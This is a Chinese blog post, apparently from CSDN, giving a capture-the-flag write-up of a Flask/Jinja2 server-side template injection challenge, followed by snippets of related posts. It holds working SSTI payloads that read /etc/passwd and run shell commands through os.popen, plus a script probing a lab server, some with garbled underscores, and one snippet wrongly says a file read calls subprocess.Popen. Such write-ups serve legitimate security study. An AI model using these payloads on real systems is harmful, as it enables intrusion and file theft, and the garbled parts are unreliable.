攻防世界-Web_python_template_injection题

最新推荐文章于 2024-04-01 22:10:58 发布
最新推荐文章于 2024-04-01 22:10:58 发布
阅读量2.5k 收藏 2
点赞数 2
分类专栏: writeup 文章标签: 安全 web安全 flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46784800/article/details/121395805
版权

flask基础

SSTI:服务器端模板注入(Server-Side Template Injection)

不正确的使用flask中的render_template_string方法会引发SSTI。

SSTI文件读取/命令执行

在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。

思路:找到父类<type 'object'>–>寻找子类–>找关于命令执行或者文件操作的模块。

_class_ 返回类型所属的对象

_mro_ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。

_base_ 返回该对象所继承的基类

_base_ 和 _mro_ 都是用来寻找基类的_

_subclasses_ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

_init_ 类的初始化方法

_globals_ 对包含函数全局变量的字典的引用

1、查找字符串的类对象

>>>[]._class_

image-20211117202306012

2、寻找基类

>>>[]._class_._mro_

image-20211117202422640

3、寻找可用引用

>>>[]._class_._mro_._subclasses_()

image-20211117202556249

4、利用可用引用

>>>[]._class_._mro_._subclasses_()[40]("/etc/passwd").read()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SHIyw5jH-1637203939287)(https://i.loli.net/2021/11/18/lwLd9IxK2Xo18Ym.png)]

搜索os模块所在的类,并利用os模块
搜索os模块的脚本:

import requests
for i in range(0, 100):
    url = "http://111.200.241.244:50349/%7B%7B''.__class__.__mro__[2].__subclasses__()["+str(i)+"].__init__.__globals__%7D%7D"
    html = requests.get(url)
    html.encoding = 'utf-8'
    if 'os' in html.text:
        print('os:' + str(i))
        break
    else:
        print(str(i) + '---')

>>>{{[]._class_._mro_[1]._subclasses_()[71]._init_._globals_[“os”].listdir(".")}}/?

image-20211118104537082

查看fl4g文件

>>>{{[]._class_._mro_[1]._subclasses_()[40](“fl4g”).read()

image-20211118104953636

成功获得flag! ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

参考文章:从零学习flask模板注入 - FreeBuf网络安全行业门户

学编程的小w
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Python100经典练习_python_
10-01
学习python,使自己能够熟练地编写程序
攻防世界Web_python_template_injection
weixin_52268949的博客
02-08 877
Web_python_template_injection 根据目意思有点像python的ssti模板注入 我们来测试一下 果真存在那么我们就用ssti的基本方法了 我们先来看看全局变量 我们先来寻找一下基类 http://111.200.241.244:62377/{{''.__class__.__mro__}} 在这里发现了object类 寻找<type ‘object’>类的所有子类中可用的引用类 http://111.200.241.244:62377/{{''.__cla
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3323
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
攻防世界Web_python_template_injection
最新发布
2302_79800344的博客
04-01 759
【代码】【攻防世界Web_python_template_injection
【愚公系列】2023年05月 攻防世界-WebWeb_python_template_injection
热门推荐
时光隧道
04-30 1万+
SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理进行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。
攻防世界】十二、Web_python_template_injection
Hi~ 土拨鼠
09-16 1060
步骤 打开所给场景,根据所给提示是python的模板注入 尝试一下漏洞是否存在:payload:/{{1+1}} 发现{{}}中的表达式被执行,构造命令执行payload:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}} 发现flag,将上述payload中的ls改为cat fl4g即可获得目标:{{''.__class__.__mro__[2].__subcl.
攻防世界CTF Web_python_template_injection
cadandme的博客
02-15 3652
记录模块注入学习过程 目:Web_python_template_injection提醒是模块注入 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 模块注入测试: 网址输入“{{1*21}}”页面显示21,说面存在“SSTI” 在其他大佬的博客中收集的相关知识: SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对pyt
攻防实训」首都安全日_-CSO论坛_-PPT_V4 - WEB应用防火墙.zip
11-27
攻防实训」首都安全日_-CSO论坛_-PPT_V4 - WEB应用防火墙 安全漏洞 安全众测 技术分析安全管理 工控安全
攻防世界 supersqli writeup
12-14
进入目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
hyenae-0.36-1_fe_0.1-1-win32.exe
04-17
只是一款基于TCP/IP协议的一款网络IP嗅探·与试压测试软件,可以用于网站压力测试也可以用来网络攻防测试,检测网站的dos承受力。
攻防靶场」law-t08-emerging_security_management_and_legal_challeng
12-04
攻防靶场」law-t08-emerging_security_management_and_legal_challenges_for_executives - 风险评估 日志审计 技术分析安全测试 WEB应用防火墙 云安全
攻防世界WEB---Web_python_template_injection
Red Rapefruit
07-24 541
有关python模板注入漏洞的学习
攻防世界--Web_python_template_injection
m0_67467924的博客
05-29 260
查看文件内容:''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()4.构造payload查看当前目录文件,''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()1.获取基本类:''.__class__.__mro__运行成功,证明存在模板注入。
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 1495
攻防世界python模板注入
攻防世界Web_python_template_injection
qq_42728977的博客
01-11 277
之前做过一次python沙盒逃逸的,但是当时只是看WP没有仔细地深入,这次仔细的探究一下这个漏洞的原理和防御。在这里只是写一点开端,后续再深入,因为我看资料发现这个漏洞牵扯到的东西挺多的。 Web_python_template_injection 原理 python模块注入、python沙河逃逸 环境 firefox、hackbar 流程 在目的URL后面添加如下命令,就可以命令执行了...
攻防世界Web_python_template_injectionweb进阶)
my_name_is_sy的博客
06-29 1959
考点为模板漏洞及其利用。
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1122
好难啊
攻防世界 web进阶区 Web_python_template_injection
m0_51395584的博客
06-17 1038
攻防世界 web进阶区 Web_python_template_injection pythonflask模板漏洞利用,本人对这个模板也不是很熟悉,大家将就看吧。
攻防世界--Web进阶--Web_python_template_injection---python模板注入---writeup
z2560088的博客
10-10 966
- 首先看到目,就知道这道是关于 **模板注入** 的,什么是模板注入呢? - 为了写 html 代码的时候方便,很多网站都会使用模板,先写好一个 html 模板文件, 比如: ```python def test(): code = request.args.get('id') html = ''' <h3>%s</h3> '''%(code) return render_template_string(html) ``` 这段代码中的 `h..
web python template injection_攻防世界-Web_python_template_injection详解
05-26
Web Python Template Injection 是一种常见的 Web 漏洞类型,通常缩写为 SSTI(Server Side Template Injection)。该漏洞是由于 Web 应用程序未正确处理用户输入导致的,攻击者可以通过构造恶意输入来执行任意代码或获取敏感信息。 Python 作为一种流行的 Web 开发语言,广泛应用于 Web 应用程序中。Python Web 框架(如 Flask、Django 等)通常使用模板引擎来生成动态内容。在模板引擎中,可以使用变量、表达式、条件语句、循环语句等功能来生成动态内容。然而,如果在模板引擎中直接使用用户输入作为变量或表达式的一部分,而没有对用户输入进行适当的验证和过滤,就可能导致模板注入漏洞。 例如,在 Flask 应用程序中,可以使用 Jinja2 模板引擎来生成动态内容。如果在模板中使用了用户输入的变量,攻击者可以构造恶意输入来执行任意代码。例如,以下代码中的 name 变量可能是用户输入的: ```python from flask import Flask, render_template, request app = Flask(__name__) @app.route('/') def index(): name = request.args.get('name', '') return render_template('index.html', name=name) if __name__ == '__main__': app.run(debug=True) ``` 在 index.html 中,可以使用 {{ name }} 来显示用户输入的 name 变量。如果攻击者在 name 中注入了模板代码,就可能导致模板注入漏洞。例如,攻击者可以构造如下的输入: ``` {{ ''.__class__.__mro__[1].__subclasses__()[414]('/etc/passwd').read() }} ``` 这段代码在模板引擎中会被解释为调用 Python 的 subprocess.Popen 函数执行命令 /etc/passwd,并读取其输出。攻击者可以通过这种方式执行任意代码,获取敏感信息或者直接控制服务器。 为了防止 SSTI 漏洞,开发人员应该对用户输入进行严格的验证和过滤,避免在模板引擎中直接使用用户输入作为变量或表达式的一部分。可以使用 Python安全模板引擎(如 jinja2-sandbox、jinja2-timeout 等)来限制模板执行的权限,或者使用模板引擎提供的安全过滤器(如 escape、safe 等)来过滤用户输入。此外,还应该及时更新 Web 应用程序和相关组件,以避免已知的漏洞攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学编程的小w

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值